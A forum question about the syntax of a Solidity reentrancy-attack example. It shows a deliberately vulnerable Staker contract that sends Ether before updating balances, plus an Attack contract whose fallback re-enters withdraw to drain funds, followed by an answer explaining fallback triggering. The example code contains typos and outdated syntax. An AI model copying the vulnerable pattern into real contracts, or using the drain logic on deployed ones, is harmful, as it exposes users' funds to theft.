# questions about Re-Entrancy attack syntax

Tags: solidity, fallback-function, reentrant-attacks

hey guys I come across this video about re-entrancy attack posted by Chainlink, but I have some questions about the syntax being covered. please help.

```
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

contract Staker {
    mapping (address => uint256) public balances;
    
    function deposit() public payable {
        balances[msg.sender] += msg.value; 
    }

    function withdraw(uint256 _amount) public {
        require(_amount < balances[msg.sender]);

        (bool success, )= msg.sender.call{value:_amount}(""); 
        require(success, "failure to send");

        balances[msg.sender] -= _amount; 
    }
}

contract Attack {
    Staker public stakerInstance; 

    constructor (address payable _stakerInstance) public {
        stakerInstance = Staker(_stakerInstance);
    }

    fallback() external payable {
        if (address(stakerInstance).balance >=0 ){
            stakerInstance.withdraw(address(stakerInstance).balance);
        }
    }

    function attack(address payable _stakerInstance) public payable {
        uint256 amount = msg.value;
        stakeInstance.deposit.value(amount)();
        stakeInstance.withdraw(amount);
    }
}
```

here's my question:

1. the video mentions that "your fallback function will be trigger when you receive the coin", why is that? I thought the fallback function will only be triggered when the function being called does not exist or no data is supplying such function.
2. for this line of code

```
 (bool success, )= msg.sender.call{value:_amount}("");
```

I thought we should use abi.encodeWithSignature after the *{value:_amount}*, but instead the coder just typed *("")*, why is this okay?

Thank you for your patience!

Answer (score 1):

The command `msg.sender.call{value:_amount}("");` is calling the calling contract while supplying some Ether value. Since it's not calling any specific function (`("")`) the contract's `receive` or `fallback` function is triggered.

Since the contract happens to have a `payable` fallback function, that gets triggered. If the contract didn't have such a function, the call would revert.

You can read more about the fallback function here: https://docs.soliditylang.org/en/v0.8.12/contracts.html#fallback-function (check also the `receive` above it)